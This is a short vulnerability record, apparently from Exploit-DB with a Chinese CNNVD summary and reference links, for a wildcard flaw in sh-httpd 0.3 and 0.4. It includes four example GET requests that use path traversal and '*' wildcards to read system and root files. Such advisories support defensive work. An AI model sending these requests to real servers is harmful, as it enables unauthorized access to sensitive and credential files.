https://www.exploit-db.com/exploits/23295
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200310-080

CharlesSteinkuehlersh-httpd0.3和0.4版本存在漏洞。远程攻击者可以通过含有星号(*)通配符的GET请求读取文件或执行任意CGI脚本。

source: http://www.securityfocus.com/bid/8897/info

A problem has been identified in the handling of some characters by sh-httpd. Because of this, an attacker may be able to gain unauthorized access to information. 


GET *
GET ../../../sh-httpd/p*
GET /../../etc/s*
GET ../../root/.b*

来源:BID
名称:8897
链接:http://www.securityfocus.com/bid/8897
来源:BUGTRAQ
名称:20031028Re:sh-httpd`wildcardcharacter’vulnerability
链接:http://www.securityfocus.com/archive/1/342766
来源:BUGTRAQ
名称:20031027sh-httpd`wildcardcharacter’vulnerability
链接:http://www.securityfocus.com/archive/1/342473
来源:XF
名称:shtttpd-get-information-disclosure(13519)
链接:http://xforce.iss.net/xforce/xfdb/13519